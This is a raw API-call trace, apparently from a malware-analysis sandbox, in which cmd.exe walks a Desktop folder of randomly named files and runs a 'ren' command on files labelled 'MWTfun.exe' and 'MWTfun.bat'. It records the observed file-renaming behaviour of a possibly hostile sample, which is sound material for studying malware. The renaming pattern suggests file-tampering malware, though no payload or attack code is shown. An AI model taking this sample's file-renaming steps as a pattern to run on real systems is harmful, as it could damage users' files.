lpFindFileData=0x21ed9574a50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4af0ff20, ftCreationTime.dwHighDateTime=0x1d5eaf6, ftLastAccessTime.dwLowDateTime=0x51221bc0, ftLastAccessTime.dwHighDateTime=0x1d5ed64, ftLastWriteTime.dwLowDateTime=0x51221bc0, ftLastWriteTime.dwHighDateTime=0x1d5ed64, nFileSizeHigh=0x0, nFileSizeLow=0x7a94, dwReserved0=0x0, dwReserved1=0x0, cFileName="zuXa5tA1VeTtCxZv.gif", cAlternateFileName="")) returned 0 [0202.830] GetLastError () returned 0x12 [0202.830] FindClose (in: hFindFile=0x21ed9a14520 | out: hFindFile=0x21ed9a14520) returned 1 [0202.830] ??_V@YAXPEAX@Z () returned 0x1 [0202.830] ??_V@YAXPEAX@Z () returned 0x1 [0202.830] ??_V@YAXPEAX@Z () returned 0x1 [0202.830] ??_V@YAXPEAX@Z () returned 0x1 [0202.830] GetProcessHeap () returned 0x21ed8c70000 [0202.830] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a145e0 [0202.830] GetProcessHeap () returned 0x21ed8c70000 [0202.830] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95760, Size=0x16) returned 0x21ed8c95660 [0202.830] GetProcessHeap () returned 0x21ed8c70000 [0202.830] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95660) returned 0x16 [0202.830] GetProcessHeap () returned 0x21ed8c70000 [0202.830] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0202.830] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0202.831] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed9a55a70 [0202.831] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a55a70, Size=0xb2) returned 0x21ed9a55a70 [0202.831] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a55a70) returned 0xb2 [0202.831] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9579550 [0202.831] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9579550, Size=0x30) returned 0x21ed9579550 [0202.831] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9579550) returned 0x30 [0202.831] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9579590 [0202.831] malloc (_Size=0x1ff9c) returned 0x21ed977fc80 [0202.831] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9572540 [0202.831] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed9572a80 [0202.831] ??_V@YAXPEAX@Z () returned 0x1 [0202.831] malloc (_Size=0x1ff9c) returned 0x21ed977fc80 [0202.831] GetProcessHeap () returned 0x21ed8c70000 [0202.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9572300 [0202.831] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed977fc80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0202.832] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6db50, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a14460 [0202.832] FindClose (in: hFindFile=0x21ed9a14460 | out: hFindFile=0x21ed9a14460) returned 1 [0202.832] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6db50, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a140a0 [0202.832] FindClose (in: hFindFile=0x21ed9a140a0 | out: hFindFile=0x21ed9a140a0) returned 1 [0202.832] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa380e7ab, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa380e7ab, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6db50, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a14e20 [0202.832] FindClose (in: hFindFile=0x21ed9a14e20 | out: hFindFile=0x21ed9a14e20) returned 1 [0202.832] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa380e7ab, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa380e7ab, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6db50, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0202.832] malloc (_Size=0x1ff9c) returned 0x21ed979fc30 [0202.832] ??_V@YAXPEAX@Z () returned 0x21ed979fc30 [0202.832] GetProcessHeap () returned 0x21ed8c70000 [0202.832] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d676b0 [0202.833] ??_V@YAXPEAX@Z () returned 0x1 [0202.833] ??_V@YAXPEAX@Z () returned 0x1 [0202.833] GetProcessHeap () returned 0x21ed8c70000 [0202.833] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9579590, Size=0x490) returned 0x21ed9579590 [0202.833] GetProcessHeap () returned 0x21ed8c70000 [0202.833] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9579590) returned 0x490 [0202.833] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0202.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.833] GetFileType (hFile=0x50) returned 0x2 [0202.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.833] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0202.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.833] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0202.839] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.840] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0202.840] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0202.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.840] GetFileType (hFile=0x50) returned 0x2 [0202.840] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.840] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0202.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.840] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0202.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.841] GetFileType (hFile=0x50) returned 0x2 [0202.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.841] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0202.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.841] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9579560*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9579560*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0202.842] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0202.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.842] GetFileType (hFile=0x50) returned 0x2 [0202.842] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.842] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0202.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.842] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0202.848] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0202.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.848] GetFileType (hFile=0x50) returned 0x2 [0202.848] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.848] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0202.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.849] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0202.853] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0202.853] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0202.853] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0202.853] malloc (_Size=0xffce) returned 0x21ed977fc80 [0202.853] ??_V@YAXPEAX@Z () returned 0x21ed977fc80 [0202.853] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0202.853] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0202.854] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0202.854] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0202.854] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0202.854] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0202.854] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0202.854] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0202.854] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0202.854] ??_V@YAXPEAX@Z () returned 0x1 [0202.854] GetProcessHeap () returned 0x21ed8c70000 [0202.854] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed9a55b40 [0202.854] GetProcessHeap () returned 0x21ed8c70000 [0202.854] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a55b40, Size=0x130) returned 0x21ed9a55b40 [0202.854] GetProcessHeap () returned 0x21ed8c70000 [0202.854] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a55b40) returned 0x130 [0202.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.854] malloc (_Size=0xffce) returned 0x21ed977fc80 [0202.854] ??_V@YAXPEAX@Z () returned 0x21ed977fc80 [0202.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.854] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed977fc80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.856] ??_V@YAXPEAX@Z () returned 0x1 [0202.856] GetProcessHeap () returned 0x21ed8c70000 [0202.856] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6a2b0 [0202.856] GetProcessHeap () returned 0x21ed8c70000 [0202.856] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed9a55c80 [0202.856] GetProcessHeap () returned 0x21ed8c70000 [0202.856] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a55c80, Size=0x130) returned 0x21ed9a55c80 [0202.856] GetProcessHeap () returned 0x21ed8c70000 [0202.856] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a55c80) returned 0x130 [0202.856] malloc (_Size=0xffce) returned 0x21ed977fc80 [0202.856] ??_V@YAXPEAX@Z () returned 0x21ed977fc80 [0202.856] GetProcessHeap () returned 0x21ed8c70000 [0202.856] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14dc0 [0202.856] GetProcessHeap () returned 0x21ed8c70000 [0202.856] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed95762a0 [0202.856] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0202.856] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0202.858] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.858] GetLastError () returned 0x2 [0202.858] GetProcessHeap () returned 0x21ed8c70000 [0202.858] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9aa69b0 [0202.858] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9aa69c0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.859] SetErrorMode (uMode=0x0) returned 0x0 [0202.859] SetErrorMode (uMode=0x1) returned 0x0 [0202.859] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed977fc80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0202.859] SetErrorMode (uMode=0x0) returned 0x1 [0202.859] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0202.859] GetProcessHeap () returned 0x21ed8c70000 [0202.859] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9575400 [0202.859] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0202.859] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0202.859] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.859] GetLastError () returned 0x2 [0202.859] ??_V@YAXPEAX@Z () returned 0x1 [0202.859] malloc (_Size=0xffce) returned 0x21ed977fc80 [0202.859] ??_V@YAXPEAX@Z () returned 0x21ed977fc80 [0202.859] malloc (_Size=0xffce) returned 0x21ed978fc60 [0202.859] ??_V@YAXPEAX@Z () returned 0x21ed978fc60 [0202.859] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.859] GetLastError () returned 0x2 [0202.860] _get_osfhandle (_FileHandle=2) returned 0x54 [0202.860] GetFileType (hFile=0x54) returned 0x2 [0202.860] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0202.860] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0202.860] _get_osfhandle (_FileHandle=2) returned 0x54 [0202.860] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0202.860] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.860] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.860] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0202.865] longjmp () [0202.865] ??_V@YAXPEAX@Z () returned 0x1 [0202.865] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c02c00, ftCreationTime.dwHighDateTime=0x1d5e98a, ftLastAccessTime.dwLowDateTime=0xea1a3650, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xea1a3650, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x12338, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="_zyi016uyI EccZobgM.pptx", cAlternateFileName="")) returned 1 [0202.865] GetProcessHeap () returned 0x21ed8c70000 [0202.865] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a96440, Size=0x5a2) returned 0x21ed9a10210 [0202.865] GetProcessHeap () returned 0x21ed8c70000 [0202.865] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a10210) returned 0x5a2 [0202.865] GetProcessHeap () returned 0x21ed8c70000 [0202.865] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9ab69a0 [0202.880] GetProcessHeap () returned 0x21ed8c70000 [0202.880] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9ab69a0, Size=0x30) returned 0x21ed9ab69a0 [0202.880] GetProcessHeap () returned 0x21ed8c70000 [0202.880] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9ab69a0) returned 0x30 [0202.880] GetProcessHeap () returned 0x21ed8c70000 [0202.880] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9ab69e0 [0202.880] malloc (_Size=0x1ff9c) returned 0x21ed979fc40 [0202.881] GetProcessHeap () returned 0x21ed8c70000 [0202.881] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8d6e5e0 [0202.881] ??_V@YAXPEAX@Z () returned 0x1 [0202.881] GetProcessHeap () returned 0x21ed8c70000 [0202.881] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9ab69e0, Size=0x200) returned 0x21ed9ab69e0 [0202.881] GetProcessHeap () returned 0x21ed8c70000 [0202.881] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9ab69e0) returned 0x200 [0202.881] GetProcessHeap () returned 0x21ed8c70000 [0202.881] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9ab6bf0 [0202.881] GetProcessHeap () returned 0x21ed8c70000 [0202.881] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9ab6bf0, Size=0x290) returned 0x21ed9ab6bf0 [0202.881] GetProcessHeap () returned 0x21ed8c70000 [0202.881] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9ab6bf0) returned 0x290 [0202.881] GetProcessHeap () returned 0x21ed8c70000 [0202.881] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9ab6e90 [0202.881] GetProcessHeap () returned 0x21ed8c70000 [0202.881] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9ab6e90, Size=0x30) returned 0x21ed9ab6e90 [0202.881] GetProcessHeap () returned 0x21ed8c70000 [0202.881] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9ab6e90) returned 0x30 [0202.881] GetProcessHeap () returned 0x21ed8c70000 [0202.881] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9ab6ed0 [0202.882] malloc (_Size=0x1ff9c) returned 0x21ed979fc40 [0202.882] GetProcessHeap () returned 0x21ed8c70000 [0202.882] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8d6e900 [0202.882] ??_V@YAXPEAX@Z () returned 0x1 [0202.882] malloc (_Size=0x1ff9c) returned 0x21ed979fc40 [0202.882] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a144c0 [0202.882] FindClose (in: hFindFile=0x21ed9a144c0 | out: hFindFile=0x21ed9a144c0) returned 1 [0202.882] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a14c40 [0202.882] FindClose (in: hFindFile=0x21ed9a14c40 | out: hFindFile=0x21ed9a14c40) returned 1 [0202.883] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa380e7ab, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa380e7ab, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a148e0 [0202.883] FindClose (in: hFindFile=0x21ed9a148e0 | out: hFindFile=0x21ed9a148e0) returned 1 [0202.883] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\_zyi016uyI EccZobgM.pptx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c02c00, ftCreationTime.dwHighDateTime=0x1d5e98a, ftLastAccessTime.dwLowDateTime=0xea1a3650, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xea1a3650, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x12338, dwReserved0=0x4, dwReserved1=0x80, cFileName="_zyi016uyI EccZobgM.pptx", cAlternateFileName="_ZYI01~1.PPT")) returned 0x21ed9a148e0 [0202.883] FindClose (in: hFindFile=0x21ed9a148e0 | out: hFindFile=0x21ed9a148e0) returned 1 [0202.883] _wcsnicmp (_String1="_ZYI01~1.PPT", _String2="_zyi016uyI EccZobgM.pptx", _MaxCount=0x18) returned 72 [0202.883] malloc (_Size=0x1ff9c) returned 0x21ed97bfbf0 [0202.884] ??_V@YAXPEAX@Z () returned 